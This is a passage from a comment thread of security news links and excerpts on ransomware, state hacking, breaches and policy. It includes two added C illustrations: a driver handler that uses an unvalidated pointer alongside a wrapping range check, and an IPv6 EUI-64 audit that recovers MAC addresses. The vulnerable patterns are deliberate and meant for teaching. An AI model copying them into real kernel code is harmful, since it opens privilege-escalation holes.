    Russian experts "would think ten times before leaving the borders of their homeland in pursuit of big earnings at foreign companies."

  8. Tomi Engdahl says:

    Mitigate Top 5 Common Cybersecurity Vulnerabilities
    https://www.trendmicro.com/en_us/devops/22/c/mitigate-top-5-common-cybersecurity-vulnerabilities.html
    Vulnerabilities in software and infrastructure are a fact of life for developers and SREs, but that doesn’t mean you must accept them. Given the exponential growth of vulnerabilities, DevOps teams must be aware of and learn how to mitigate these risks to ensure healthy systems and applications. This article will focus on five common vulnerabilities in no particular order of severity. We’ll examine some in-depth information on each vulnerability’s root cause and how it can impact affected services. Then, we’ll explore how to spot these vulnerabilities and outline basic strategies for remediation.

  9. Tomi Engdahl says:

    University of Vaasa researchers propose joint cyber security exercises for the energy sector: "In cyber security, the human is the weakest link"
    https://yle.fi/uutiset/3-12370250
    Sometimes an organization counters cyber risks with technically excellent solutions, while the practical risks arising from, for example, human behaviour go unnoticed. The University of Vaasa survey was carried out in summer 2021. According to Professor Tero Vartiainen, the survey did not get as many responses as might have been hoped, but based on the responses received it can be said that the energy sector recognizes the risks related to cyber security. Based on the survey, Vartiainen and his research group have concluded that the energy sector wants cooperation and, for example, joint cyber security exercises between the public and private sectors.

  10. Tomi Engdahl says:

    Sandworm: A tale of disruption told anew
    https://www.welivesecurity.com/2022/03/21/sandworm-tale-disruption-told-anew/
    For cybersecurity pundits, it has become a doctrine that cyberdisruption, whether perpetrated directly or via proxy groups, can be expected to accompany military, political, and economic action as a way of softening up targets or of strategically applying pressure via subterfuge. Thus, in a time of war in Ukraine, the spotlight has also naturally turned to cyberwarfare, both past and present. Since at least 2014, companies in Ukraine or with network access to the region have suffered the likes of malware such as BlackEnergy, TeleBots, GreyEnergy, Industroyer, NotPetya, Exaramel, and, in 2022 alone, WhisperGate, HermeticWiper, IsaacWiper, and CaddyWiper. In all cases, except the last four, the cybersecurity community discovered enough code similarities, shared command and control infrastructure, malware execution chains and other hints to attribute all the malware samples to one overarching group: Sandworm.

  11. Tomi Engdahl says:

    Exploring a New Class of Kernel Exploit Primitive
    https://msrc-blog.microsoft.com/2022/03/22/exploring-a-new-class-of-kernel-exploit-primitive/
    The security landscape is dynamic, changing often and as a result, attack surfaces evolve. MSRC receives a wide variety of cases spanning different products, bug types and exploit primitives. One particularly interesting primitive we see is an arbitrary kernel pointer read.
    These often happen when kernel mode code does not validate that pointers read from attacker-controlled input actually point to the user-mode portion of the Virtual Address Space (VAS). However, it isn’t always clear how to assess cases where the primitive an attacker has is to cause an arbitrary kernel pointer read but cannot leak the data. Traditionally, these would have an impact of Denial of Service (DoS) or in some cases a second-order Kernel Memory Information Disclosure (where side channels or indirect probing are possible), but we wonder if such a limited primitive could actually be exploited for code execution / privilege escalation. The idea we wanted to explore when pondering the above question was: can we exploit reads to Memory Mapped I/O (MMIO) ranges of peripheral device drivers? Reads to MMIO ranges are used for two-way communication between the device driver and the IO device and it wouldn’t be a stretch to imagine that they would be sensitive to the order, timing and even the size of memory reads issued to their respective MMIO space.

    Reply
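    The missing validation the MSRC post describes, as an added illustration in C that is not from the post or from Microsoft: a model driver handler that uses a caller-supplied pointer with no check, with a range check whose addition wraps, and with an overflow-safe probe. USER_VAS_LIMIT, the request layout and the status codes are constructed assumptions, not Windows definitions.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for the highest user-mode address. A real kernel
 * reads this boundary at runtime (Windows x64 exposes it as
 * MmUserProbeAddress); the value used here is only an assumption. */
#define USER_VAS_LIMIT 0x00007FFFFFFF0000ULL

/* How the handler validates a caller-supplied pointer. */
enum probe_mode { CHECK_NONE, CHECK_NAIVE, CHECK_PROBED };

enum { STATUS_OK = 0, STATUS_ACCESS_VIOLATION = 1 };

/* Caller-controlled read request as it might arrive in an IOCTL buffer. */
typedef struct {
    uint64_t src;   /* pointer taken straight from attacker-controlled input */
    uint32_t len;   /* number of bytes the driver would read */
} read_request_t;

/* Common but wrong range check: ptr + len is computed in 64-bit arithmetic
 * and can wrap around to a small value, so a kernel address passes. */
bool naive_user_range_check(uint64_t ptr, uint64_t len) {
    return ptr + len <= USER_VAS_LIMIT;
}

/* Overflow-safe probe: accept only if [ptr, ptr + len) lies entirely in the
 * user-mode VAS. Kernel addresses, and with them the device MMIO ranges the
 * post worries about, are mapped above the limit and are rejected. */
bool probe_user_range(uint64_t ptr, uint64_t len) {
    if (ptr > USER_VAS_LIMIT)
        return false;
    return len <= USER_VAS_LIMIT - ptr;
}

/* Model of the driver's request handler. CHECK_NONE is the vulnerable
 * pattern from the post: the pointer is used without any validation. */
int handle_read_request(const read_request_t *req, enum probe_mode mode) {
    bool ok;
    switch (mode) {
    case CHECK_NAIVE:
        ok = naive_user_range_check(req->src, req->len);
        break;
    case CHECK_PROBED:
        ok = probe_user_range(req->src, req->len);
        break;
    default:
        ok = true;   /* no validation: the read proceeds wherever src points */
        break;
    }
    return ok ? STATUS_OK : STATUS_ACCESS_VIOLATION;
}

int main(void) {
    /* Constructed requests: a legitimate user buffer, a kernel-range pointer,
     * and a pointer whose (src + len) wraps around the 64-bit address space. */
    read_request_t reqs[] = {
        { 0x0000000000010000ULL, 0x100 },
        { 0xFFFF800000000000ULL, 0x100 },
        { 0xFFFFFFFFFFFFFFF0ULL, 0x20 },
    };
    const char *names[] = { "none", "naive", "probed" };
    for (size_t i = 0; i < sizeof reqs / sizeof reqs[0]; i++)
        for (int m = CHECK_NONE; m <= CHECK_PROBED; m++)
            printf("src=%#018llx len=%#x check=%-6s -> %s\n",
                   (unsigned long long)reqs[i].src, reqs[i].len, names[m],
                   handle_read_request(&reqs[i], (enum probe_mode)m) == STATUS_OK
                       ? "read allowed" : "rejected");
    return 0;
}
```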
  12. Tomi Engdahl says:

    Vendor Security Assessment
    https://www.ncsc.gov.uk/report/vendor-security-assessment
    This document provides guidance on how operators should assess the security of vendor’s security processes and vendor equipment and is referenced in the Telecom Security Act Code of Practice. The purpose of the guidance is to allow operators to objectively assess the cyber risk due to use of the vendor’s equipment. This is performed by gathering objective, repeatable evidence on the security of the vendor’s processes and network equipment. Report:
    https://www.ncsc.gov.uk/files/NCSC-Vendor-Security-Assessment.pdf

    Reply
  13. Tomi Engdahl says:

    IoT Security and the Internet of Forgotten Things https://securityintelligence.com/articles/iot-security-internet-forgotten-thing/
    In 2017, the number of connected devices surpassed the world’s human population. That’s a lot of things. However, many of them were not built with security in mind. It didn’t take long for attackers to take advantage of Internet of Things (IoT) vulnerabilities. One case in 2016 saw threat actors take down Dyn, a company that managed web traffic for Twitter, Spotify, Netflix, Reddit, Etsy, Github and other major brands. Threat actors inserted Mirai malware to commandeer at least 100,000 devices (webcams, DVRs, etc.) as zombies to launch a massive attack against Dyn. Fast forward to now. How many IoT devices are out there waiting for a breach? Today, about 12.3 billion devices connect to the internet worldwide. What about the devices you might have forgotten about? Can they still connect to your network? What’s the risk? Even more importantly, what can you do about it? Let’s find out.

    Reply
  14. Tomi Engdahl says:

    How legacy IPv6 addresses can spoil your network privacy https://www.theregister.com/2022/03/22/legacy_ipv6_addressing_standard_enables/
    A single device within an IPv6 home network can reduce the privacy of every computer, handheld, and other gadget on that network, enabling all devices to be tracked around the internet, even those with IPv6 privacy protections. In a research paper titled “One Bad Apple Can Spoil Your IPv6 Privacy,” Said Jawad Saidi, of MPI-INF in Germany; Oliver Gasser, also of the MPI-INF; and Georgios Smaragdakis, of TU Delft in the Netherlands describe how the use of legacy IPv6 addressing standard EUI-64, aka Extended Unique Identifier, by just one device potentially degrades privacy to every device on that network. Their paper is scheduled to be published next month in ACM SIGCOMM Computer Communication Review, Volume 52, Issue 2. Paper:
    https://arxiv.org/abs/2203.08946

    Reply
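    A check for the EUI-64 identifiers the paper above is about, as an added example in C that is not from the paper or The Register: it parses an IPv6 address, reports whether its interface identifier carries the ff:fe marker, and recovers the underlying MAC, so an operator can audit a neighbour table for devices that still use the legacy scheme. The sample addresses are constructed.

```c
#define _POSIX_C_SOURCE 200112L
#include <arpa/inet.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Audit verdict for one address. */
typedef struct {
    bool parsed;       /* text was a syntactically valid IPv6 address */
    bool eui64;        /* interface identifier carries the ff:fe EUI-64 marker */
    bool global_mac;   /* U/L bit set: built from a burned-in (globally unique) MAC */
    uint8_t mac[6];    /* MAC recovered from the identifier when eui64 is true */
} eui64_audit_t;

/* Modified EUI-64 builds the 64-bit interface ID from a 48-bit MAC by
 * inserting 0xFFFE between its two halves and flipping the universal/local
 * bit (0x02 of the first byte). Reversing that exposes the MAC, which is
 * why one such device makes the whole network trackable. */
eui64_audit_t audit_ipv6(const char *text) {
    eui64_audit_t r;
    unsigned char a[16];
    memset(&r, 0, sizeof r);
    if (inet_pton(AF_INET6, text, a) != 1)
        return r;
    r.parsed = true;
    /* ::/8 holds no SLAAC interface IDs (unspecified, loopback, IPv4-mapped),
     * so do not look for the marker there. */
    if (a[0] == 0x00)
        return r;
    if (a[11] != 0xFF || a[12] != 0xFE)
        return r;
    r.eui64 = true;
    r.global_mac = (a[8] & 0x02) != 0;
    r.mac[0] = a[8] ^ 0x02;   /* undo the U/L bit flip */
    r.mac[1] = a[9];
    r.mac[2] = a[10];
    r.mac[3] = a[13];         /* skip the inserted ff:fe at a[11], a[12] */
    r.mac[4] = a[14];
    r.mac[5] = a[15];
    return r;
}

/* Render a MAC as colon-separated hex into a caller-provided 18-byte buffer. */
void format_mac(const uint8_t mac[6], char out[18]) {
    snprintf(out, 18, "%02x:%02x:%02x:%02x:%02x:%02x",
             mac[0], mac[1], mac[2], mac[3], mac[4], mac[5]);
}

/* Count how many addresses in a list (for example, a router's neighbour
 * table) still use EUI-64 identifiers. */
size_t count_eui64(const char *const *addrs, size_t n) {
    size_t hits = 0;
    for (size_t i = 0; i < n; i++)
        if (audit_ipv6(addrs[i]).eui64)
            hits++;
    return hits;
}

int main(void) {
    /* Constructed sample: a global EUI-64 address, a random (privacy)
     * identifier, a link-local EUI-64 address and a static address. */
    const char *const sample[] = {
        "2001:db8::211:22ff:fe33:4455",
        "2001:db8::a1b2:c3d4:e5f6:708",
        "fe80::1e2a:b3ff:fe4c:5d6e",
        "2001:db8::1",
    };
    size_t n = sizeof sample / sizeof sample[0];
    for (size_t i = 0; i < n; i++) {
        eui64_audit_t r = audit_ipv6(sample[i]);
        char mac[18] = "-";
        if (r.eui64)
            format_mac(r.mac, mac);
        printf("%-32s eui64=%d global_mac=%d mac=%s\n",
               sample[i], r.eui64, r.global_mac, mac);
    }
    printf("%zu of %zu addresses expose a MAC via EUI-64\n",
           count_eui64(sample, n), n);
    return 0;
}
```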
  15. Tomi Engdahl says:

    Wartime Cyber Insurance Wobbled By New Fine Print. Do Boards Know?
    https://www.forbes.com/sites/noahbarsky/2022/03/22/wartime-cyber-insurance-wobbled-by-new-fine-print/
    The Russia-Ukraine war has spiked cybersecurity concerns. As companies internally question digital defense adequacy, insurance provides a popular mitigation fallback against breach-related losses. Yet, surprising to many policyholders, a recent court ruling may soon undercut wartime cyber claims. In January 2022, Merck won a $1.4 billion judgment against Ace Insurance related to a 2017 NotPetya malware attack which damaged 40,000 company computers. Ace denied Merck’s claim on the basis that ransomware was excluded under rarely-invoked “act of war” exemptions. The court ruled against Ace, prompting prominent insurers to swiftly revise policy coverage terms related to cyber losses. Lloyd’s Market Association’s (LMA) Cyber Business Panel recently published four cyberinsurance policy exclusion clauses, which significantly broaden insurers’ protection against “cyber operations” launched by governments or surrogates. These evolving terms parallel emerging cybersecurity insurance legal precedents.

    Reply
  16. Tomi Engdahl says:

    Okta Hack Exposes A Huge Hole In Tech Giant Security https://www.forbes.com/sites/thomasbrewster/2022/03/23/okta-hack-exposes-a-huge-hole-in-tech-giant-security/
    Under Costa Rica’s sunny skies, in a pastel-colored office space northwest of the capital San José, employees are beavering away in their cubicles, answering calls and providing tech support for customers. They work for a little-known outsourcing firm called Sykes.
    Most people have never heard of the company, even though it’s now part of Sitel Group. According to LinkedIn profiles, its staff have done contract work for companies that are instantly recognizable, such as Amazon and Cisco, to name two. Working as a Sykes customer-support employee requires access to data of the contracting company’s big-name clients. That access, it turns out, is very attractive to hackers.
    Sykes confirmed to Forbes that “parts” of its network were hacked in January, claiming it didn’t believe any serious breach had occurred and there was no longer a risk for its corporate customers (or for the customers of its customers). Okta later said that the breach lasted five days and allowed the hackers to reset passwords and those one-time codes.

    Reply
  17. Tomi Engdahl says:

    A Line Drawn in the Network
    https://yle.fi/uutiset/3-12370108
    Cyber war has been declared to have begun several times over the past decades. In hindsight, the declarations have proved premature.
    Is it different now? Over the past eight years, Russian hackers have repeatedly broken into the systems of Ukrainian authorities, banks, media and companies. Denial-of-service attacks are an everyday occurrence, and several dangerous pieces of malware have spread from Ukraine to the rest of the world. Cyber war is a term that is hard to define.
    Generally it means the exploitation of information technology alongside military action. On the other hand, cyber warfare is often considered to include, in addition to cyber attacks on enemy systems, network intelligence and espionage. The boundaries of cyber war are much blurrier than those of conventional war, whose boundaries are not entirely clear either. If network intelligence conducted by states is cyber war, we have been fighting a global cyber war for decades. If, on the other hand, advanced network attacks must be connected to physical military operations, the world's first cyber war may still lie ahead.

    Reply
  18. Tomi Engdahl says:

    Bad Actors Trying to Capitalize on Current Events via Shameless Email Scams https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams
    Malicious email and phishing scams are usually topical and follow a pattern of current events. They are usually crafted around calendar and/or trending issues as attackers realize that victims are interested in all things relevant to the moment. Threat actors are aware that not all recipients will bite, but some will, hence the origination of the term “phishing.” Threat actors often put in the least amount of work possible for a maximum return, sending out phishing emails to thousands of targets. Even if less than one percent of victims respond, the return on investment is still significant due to the gain of PII and/or establishing a foothold within an organization using stolen credentials, malware, or other means. This blog highlights some examples we’ve encountered that may help users better spot suspicious emails. Recent examples observed by FortiGuard Labs include emails related to tax season and the Ukrainian conflict, which reflect the timeliness of current and newsworthy events at the time of writing.

    Reply
  19. Tomi Engdahl says:

    This is how much the average Conti hacking group member earns a month https://www.zdnet.com/article/this-is-how-much-the-average-conti-hacking-group-member-earns-a-month/
    The average Conti ransomware group member earns a salary of $1,800 per month, a figure you might consider low considering the success of the criminal gang. On Wednesday, Secureworks published a set of findings based on the group’s internal chat logs, leaked earlier this month and pored over by cybersecurity researchers ever since. Check Point researchers have previously scoured the Conti chat logs and exposed a rather “mundane” operation, the type you’d expect a typical software development business to run. This included a business infrastructure offering office, hybrid, or remote work options, performance reviews, bonuses, and a hiring process for coders, testers, system administrators, and HR. See also:
    https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships

    Reply
  20. Tomi Engdahl says:

    Hackers steal from hackers by pushing fake malware on forums https://www.bleepingcomputer.com/news/security/hackers-steal-from-hackers-by-pushing-fake-malware-on-forums/
    Security analysts from two companies have spotted a new case of hackers targeting hackers via clipboard stealers disguised as cracked RATs and malware building tools. Clipboard stealers are quite common, typically used to monitor the clipboard content of a victim to identify cryptocurrency wallet addresses and replace them with one belonging to the malware operator. This allows attackers to hijack financial transactions on the fly, and transfer the money to their accounts. These stealers focus on the more popular cryptocurrencies, like Bitcoin, Ethereum, and Monero.

    Experts: Cyber threats demand strong leadership: “Security chiefs are now joining management teams”
    https://www.kauppalehti.fi/uutiset/asiantuntijat-kyberuhkat-vaativat-lujaa-johtamista-tietoturvapomot-nousevat-nyt-johtoryhmiin/75cfbf30-728c-4cbb-92e0-d64845992137
    At an event on security threats in the chemical industry, several experts stressed that leadership plays a big role when a company prepares for growing cyber threats. “Preparedness must be managed just like the rest of the business. There must be short-term and long-term goals. Cyber security must be driven into the organisation's culture,” said Orion's information security manager Petri Vilander. This also involves active communication about security risks to one's own staff. According to Vilander, it must not be secretive; it must be as open as possible.

    Reply
  21. Tomi Engdahl says:

    Study: One in five companies has paid or would pay a ransom for its data
    https://www.kauppalehti.fi/uutiset/tutkimus-joka-viides-yritys-on-maksanut-tai-maksaisi-lunnaita-tiedoistaan/5295a94d-631a-451d-9738-6edc9109a5a4
    Malware, ransomware and phishing are a persistent plague for international organisations. Of organisations with revenue above $100 million, one in five (21%) has experienced a ransomware attack in the past year, and for 43 percent the attack had a significant impact on operations.
    The figures come from the just-published 2022 Thales Data Threat Report. According to the study, a fifth (22%) of organisations worldwide have admitted to paying, or estimate that if necessary they would pay, a ransom for their data. Read also:
    https://cpl.thalesgroup.com/data-threat-report

    Reply
  22. Tomi Engdahl says:

    US and Canada reinstate cybercrime forum to prevent Russian cyber-attacks https://portswigger.net/daily-swig/us-and-canada-reinstate-cybercrime-forum-to-prevent-russian-cyber-attacks
    The US and Canada have reestablished the Cross-Border Crime Forum (CBCF) to discuss cybercrime and other issues. In a statement released yesterday (March 22), the US Department of Justice (DoJ) said that the two nations will meet to discuss further cooperation on cross-border crimes. “Given the interconnectedness of US and Canadian industry and economies, we affirm our shared commitment to work bilaterally to combat common cyber threats, such as ransomware attacks, and to strengthen critical infrastructure cybersecurity and resilience,” the release reads. The focus on collaboration comes in the wake of the war in Ukraine. The statement reads: “We are working vigilantly to protect the cybersecurity of our critical infrastructure sectors given Russia’s further invasion of Ukraine.”

    Reply
  23. Tomi Engdahl says:

    Serious Security: DEADBOLT the ransomware that goes straight for your backups https://nakedsecurity.sophos.com/2022/03/23/serious-security-deadbolt-the-ransomware-that-goes-straight-for-for-your-backups/
    In January 2021, reports surfaced of a backup-busting ransomware strain called Deadbolt, apparently aimed at small businesses, hobbyists and serious home users. As far as we can see, Deadbolt deliberately chose a deadly niche in which to operate: users who needed backups and were well-informed enough to make them, but who didn’t have the time or funds to look after those backups as a full-time task, or even as part of a reliable part-time routine. Many ransomware attacks unfold with cybercriminals breaking into your network, mapping out all your computers, scrambling all the files on all of them in unison, and then changing everyone’s wallpaper to show a blackmail demand along the lines of, “Pay us $BIGVAL and we’ll send you a decryption key to unlock everything.” Deadbolt, however, ignores the desktops and laptops on your network, instead finding and attacking vulnerable network-attached storage (NAS) devices directly over the internet.

    Gone in 52 Seconds and 42 Minutes: A Comparative Analysis of Ransomware Encryption Speed https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html
    Do you feel like every other cybersecurity news story mentioned ransomware in 2021? Does it feel like you can’t turn on a cybersecurity podcast and not hear the “R” word? We feel the same way, and as a cybersecurity vendor, we felt that we should also contribute to the noise. :-) But we did want to try and do something different.
    We decided to measure how fast ransomware encrypts files; not just one or two ransomware binaries, but dozens of them all using Splunk. Why?
    Well, partly because we have an unlimited Splunk license, but also because we couldn’t find the answer to the question: “How long do you have until ransomware encrypts your systems?” This seems like knowledge that organizations could use to organize their defenses.

    Reply
  24. Tomi Engdahl says:

    Samba 4.16 release strips away more SMB 1 https://www.theregister.com/2022/03/23/samba_416_toctou_smb/
    The Samba project just released version 4.16, and with it parts of the veteran SMB 1 file-sharing protocol are being permanently removed.
    Among other changes, Samba 4.16 removes the SMB 1 commands that allow a client computer to request the server copy a file without sending it over the network, and the commands that cause server-side wildcard expansion. Both are rarely used, but this is the beginning of the end for accessing Samba shares from any 20th century version of Windows.
    SMB 1 was already deprecated and off by default since Samba 4.11.
    Although SMB over NetBEUI first appeared in LAN Manager in 1987, SMB over TCP/IP is about 30 years old. Microsoft has wanted to banish it for some time. It’s been deprecated since 2015, but as late as XP and Windows Server 2003, it was the only version the OS understood.

    Reply
  25. Tomi Engdahl says:

    Motivating developers to write secure code https://www.ncsc.gov.uk/blog-post/motivating-developers-to-write-secure-code
    As we spoke about previously, we continue to see the exploitation of common software vulnerabilities leading to high impact outcomes. This is despite the availability of security tools and processes (think Security Development Lifecycles) that are designed to help improve the security of software development. This leads us to question why these tools are not having the desired impact. Back in 2017 we trailed an NCSC-sponsored research project looking into how software developers could be motivated and enabled to adopt and integrate secure coding practices. Run by our Research Institute, RISCS, the project’s full title is ‘Motivating Jenny to write secure software: community and culture of coding’. It has now borne fruit in the form of a toolkit, designed to help organisations of all sizes change the conversation about security within and around development teams. This blog post will outline the major findings of the research, which through engagement with developers, has produced a toolkit to help developers consider security during their daily jobs. Toolkit:
    https://motivatingjenny.org/index.html

    Reply
  26. Tomi Engdahl says:

    Closing the cybersecurity skills gap Microsoft expands efforts to 23 countries https://blogs.microsoft.com/blog/2022/03/23/closing-the-cybersecurity-skills-gap-microsoft-expands-efforts-to-23-countries/
    Cybersecurity continues to be a significant threat for governments, businesses and individuals around the world. From supply chain disruptions to ransomware attacks, cybercriminals have become increasingly sophisticated and the threat landscape more diverse.
    These cybersecurity challenges are compounded by a workforce shortage; there simply aren’t enough people with the cybersecurity skills needed to fill open jobs. This is a global problem. By 2025, there will be 3.5 million cybersecurity jobs open globally, representing a 350% increase over an eight-year period. We recently announced a national skilling campaign in the United States, where for every two jobs in cybersecurity today, a third goes unfilled. We’re working with community colleges to help close the gap and increase diversity in the profession. Today, Microsoft is announcing the expansion of our cybersecurity skills campaign to an additional 23 countries. The expansion will see new targeted investments in the following countries: Australia, Belgium, Brazil, Canada, Colombia, Denmark, France, Germany, India, Ireland, Israel, Italy, Japan, Korea, Mexico, New Zealand, Norway, Poland, Romania, South Africa, Sweden, Switzerland, and the United Kingdom. These countries have an elevated cyberthreat risk, coupled with a significant gap in their cybersecurity workforces both in terms of the number of professionals employed in cybersecurity vs. the demand, as well as a lack of diversity.

    Reply
  27. Tomi Engdahl says:

    Microsoft, Nvidia extend Azure confidential computing to GPUs https://www.theregister.com/2022/03/23/microsoft_and_nvidia_extend_azure/
    Microsoft has linked up with Nvidia to enable confidential computing in its Azure cloud to encompass the graphics giant’s GPUs. This will allow GPUs to process workloads on Azure that call for the highest level of protection, such as applications in healthcare or financial services. With confidential computing support for Nvidia A100 GPUs paired with hardware-protected virtual machines, organizations will be able to use even sensitive datasets to train and deploy more accurate AI models without compromising security or performance, Microsoft claimed.

    Nvidia’s Morpheus AI security framework to land in April https://www.theregister.com/2022/03/23/nvidia_morpheus_ai/
    Nvidia teased several updates to its Morpheus AI security framework at GTC this week, and also announced it would make the application framework generally available in April. In addition to releasing a pre-built version of Morpheus, Nvidia will also publish the framework’s full source code on GitHub to allow developers to modify Morpheus and build security applications on top of the software. Since the chip designer emitted Morpheus via an early-access program nine months ago, almost 700 developers and security vendors including Cisco, F5, Lacework, and Splunk have built threat detection and log-ingestion applications using Nvidia’s framework, said Bartley Richardson, senior AI infrastructure manager at Nvidia, during a security session on Tuesday.

    Reply
  28. Tomi Engdahl says:

    Some developers are fouling up open-source software https://www.zdnet.com/article/some-developers-are-fouling-up-open-source-software
    From ethical concerns, a desire for more money, and simple obnoxiousness, a handful of developers are ruining open-source for everyone. One of the most amazing things about open-source isn’t that it produces great software. It’s that so many developers put their egos aside to create great programs with the help of others. Now, however, a handful of programmers are putting their own concerns ahead of the good of the many and potentially wrecking open-source software for everyone.

    Reply
  29. Tomi Engdahl says:

    Police warn: Do not join criminal online activity even in a crisis https://poliisi.fi/blogi/-/blogs/poliisi-varoittaa-ethan-lahde-mukaan-rikolliseen-verkkotoimintaan-edes-kriisitilanteessa
    According to police information and observations, the situation in Ukraine has given rise to a phenomenon in which internet users have started committing cybercrimes against actors considered to be linked to, or supporting, Russia's attack. We want to remind everyone that whatever the motive, it does not justify breaking the law.

    Reply
  30. Tomi Engdahl says:

    Phishing-kit market: what’s inside “off-the-shelf” phishing packages https://securelist.com/phishing-kit-market-whats-inside-off-the-shelf-phishing-packages/106149/
    Phishing kits are ready-to-deploy packages which require the bare minimum effort to use. Moreover, their developers usually provide instructions with their products for inexperienced attackers.

    Reply
  31. Tomi Engdahl says:

    Nearly $7 billion was lost through internet crimes in 2021, surpassing a record set in 2020 by about $1.7 billion, according to the FBI’s annual Internet Crime Report https://therecord.media/fbi-6-9-billion-lost-through-internet-crimes-in-2021/
    Also: FBI Report
    https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf

    Reply
  32. Tomi Engdahl says:

    Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector https://www.cisa.gov/uscert/ncas/alerts/aa22-083a
    On March 24, 2022, the U.S. Department of Justice unsealed indictments of three Russian Federal Security Service (FSB) officers and a Russian Federation Central Scientific Research Institute of Chemistry and Mechanics (TsNIIKhM) employee for their involvement in the following intrusion campaigns against U.S. and international oil refineries, nuclear facilities, and energy companies.

    Reply
  33. Tomi Engdahl says:

    Mining data from Cobalt Strike beacons
    https://research.nccgroup.com/2022/03/25/mining-data-from-cobalt-strike-beacons/
    Today, RIFT is making this extensive beacon dataset publicly available in combination with the open-source release of dissect.cobaltstrike, our Python library for studying and parsing Cobalt Strike related data.

    Reply
  34. Tomi Engdahl says:

    Europe’s Digital Markets Act Takes a Hammer to Big Tech https://www.wired.com/story/digital-markets-act-messaging/
    The DMA, which is expected to be enforced before the end of this year, will require companies like Apple, Facebook parent Meta, and Google to let their services intertwine with those of rivals.

    Reply
  35. Tomi Engdahl says:

    US says Kaspersky poses unacceptable risk to national security https://www.bleepingcomputer.com/news/security/us-says-kaspersky-poses-unacceptable-risk-to-national-security/
    The Federal Communications Commission (FCC) added Russian cybersecurity firm Kaspersky to its Covered List, saying it poses unacceptable risks to U.S. national security.

    HackerOne kicks Kaspersky’s bug bounty program off its platform https://www.bleepingcomputer.com/news/security/hackerone-kicks-kaspersky-s-bug-bounty-program-off-its-platform/
    Bug bounty platform HackerOne disabled Kaspersky’s bug bounty program on Friday following sanctions imposed on Russia and Belarus after the invasion of Ukraine.

    Reply
  36. Tomi Engdahl says:

    ‘Precursor malware’ infection may be sign you’re about to get ransomware, says startup https://www.theregister.com/2022/03/26/lumu-ransomware-precursor-malware/
    A ransomware infection is usually preceded by what Lumu founder and CEO Ricardo Villadiego calls “precursor malware, ” essentially reconnaissance malicious code that has been around for a while and which lays the groundwork for the full ransomware campaign to come.

    Reply
  37. Tomi Engdahl says:

    Windows Event Log Evasion Review
    http://windowsir.blogspot.com/2022/03/windows-event-log-evasion-review.html
    In her blog post, Lina references detection techniques, something that is extremely important for all analysts to understand. What Lina is alluding to is the need for analysts to truly understand their tools, and how they work

    Reply
  38. Tomi Engdahl says:

    Phishing kits constantly evolve to evade security software https://www.bleepingcomputer.com/news/security/phishing-kits-constantly-evolve-to-evade-security-software/
    Modern phishing kits sold on cybercrime forums as off-the-shelve packages feature multiple, sophisticated detection avoidance and traffic filtering systems to ensure that internet security solutions won’t mark them as a threat.

    Reply
  39. Tomi Engdahl says:

    Meet the Secretive US Company Building an ‘Unbreakable’ Internet Inside Russia https://www.vice.com/en/article/z3n5e9/russian-internet-lantern
    The company is Lantern, which says it has seen staggering growth inside Russia in the last four weeks for its app that allows users to bypass restrictions the Kremlin has put in place on platforms like Facebook, Twitter, and Instagram.

    Reply
  40. Tomi Engdahl says:

    Open Source Software Faces Threats of Protestware and Sabotage | WIRED
    https://www.wired.com/story/open-source-sabotage-protestware/

    Reply
  41. Tomi Engdahl says:

    Is a nation-state digital deterrent scenario so far-fetched?
    https://www.welivesecurity.com/2022/03/24/is-nation-state-digital-deterrent-scenario-so-far-fetched/
    Imagine this unlikely scenario where one side or the other starts lobbing zero-day grenades at the other side’s tech, causing them to send several of their own zero-day missiles back.

    Reply
  42. Tomi Engdahl says:

    US, EU Sign Data Transfer Deal to Ease Privacy Concerns
    https://www.securityweek.com/us-eu-sign-data-transfer-deal-ease-privacy-concerns

    The European Union and United States made a breakthrough in their yearslong battle over the privacy of data that flows across the Atlantic with a preliminary agreement Friday that paves the way for Europeans’ personal information to be stored in the U.S.

    President Joe Biden and European Commission President Ursula von der Leyen announced the deal during Biden’s stop in Brussels while on a European tour amid Russia’s war in Ukraine.

    Business groups hailed the announcement, saying it will provide relief to thousands of companies, including tech giants like Google and Facebook, that faced uncertainty over their ability to send data between the U.S. and Europe, which has much stricter regulations on data privacy.

    The agreement came hours after EU officials agreed on sweeping new digital rules to rein in the power of big tech companies such as Facebook and Google.

    “Today we’ve agreed to unprecedented protections for data privacy and security for our citizens,” Biden said. “This new arrangement will enhance the Privacy Shield framework, promote growth and innovation in Europe and the United States, and help companies — both small and large — compete in the digital economy.”

    Von der Leyen said the agreement “will enable predictable and trustworthy data flows between the EU and the U.S., safeguarding privacy and civil liberties.”

    Reply
  43. Tomi Engdahl says:

    Demystifying Zero Trust
    https://www.securityweek.com/demystifying-zero-trust

    While many vendors use terms that include “zero trust,” they often use it to mean different things

    The pandemic increased the need to secure remote and hybrid workers, and a side-effect has been a surge in interest, hype, and confusion surrounding zero trust concepts. Vendors have been quick to put out a wide range of messaging on zero trust, which has led to a lot of misunderstanding as to what zero trust actually is.

    A neutral place to start is the NIST Special Publication 800-207, which says, zero trust “is not a single architecture but a set of guiding principles for workflow, system design, and operations.” NIST refers to these principles as the “tenets” of zero trust.

    In other words, zero trust is not simply a product. If someone says it is, they probably either don’t know what they’re talking about or have watered down their marketing to the point of making it misleading.

    https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf

    Reply
  44. Tomi Engdahl says:

    Here are a few names and acronyms you’re likely to see and what they mean from a practical standpoint.

    • Zero trust access (ZTA) is about knowing and controlling who and what is on your network. Role-based access control is a critical component of access management. ZTA covers user endpoints with a least access policy that grants users the minimum level of network access required for their role.

    • Zero trust network access (ZTNA) is a way of controlling access to applications regardless of where the user or the application resides. And unlike a VPN, ZTNA extends the zero-trust model beyond the network and reduces the attack surface by hiding applications from the internet.

    • Zero trust edge (ZTE) is an architecture described by Forrester that converges networking and security but isn’t limited to the cloud like Secure Access Service Edge (SASE). Based on zero-trust principles, it starts on-premises with a software-defined wide area network (SD-WAN), firewalls, and ZTNA. It ends in the cloud with routing, secure web gateways, and cloud security gateways.

